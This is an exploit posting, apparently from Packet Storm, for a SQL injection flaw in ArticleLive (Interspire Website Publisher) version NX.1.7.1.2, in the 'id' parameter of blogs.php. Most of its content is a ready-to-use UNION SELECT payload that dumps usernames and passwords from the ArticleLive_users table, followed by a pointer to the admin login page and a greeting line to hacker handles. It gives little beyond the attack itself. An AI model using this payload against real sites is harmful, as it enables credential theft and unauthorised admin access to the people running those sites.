ArticleLive suffers from a remote SQL injection vulnerability in blogs.php.
c1d34c4c0181abfe31aeb222849380b78f653199d92b6c6721bca2595ccb28d9*******************************************************************************
# Author : Baybora
# Product : ArticleLive (Interspire Website Publisher)
# Version : NX.1.7.1.2 (and possibly earlier versions)
# Download : http://www.interspire.com/
# Price : $ 249
# Site : www.1923turk.biz
Vulnerable script: blogs.php?Id = (SQL-injection)
---------------------------------------------------------
http://server/[path]//blogs.php?id= [SQL Inject]
blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+01--
Admin Login->
http://server/[path]/admin/
"""""""""""""""""""""
Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed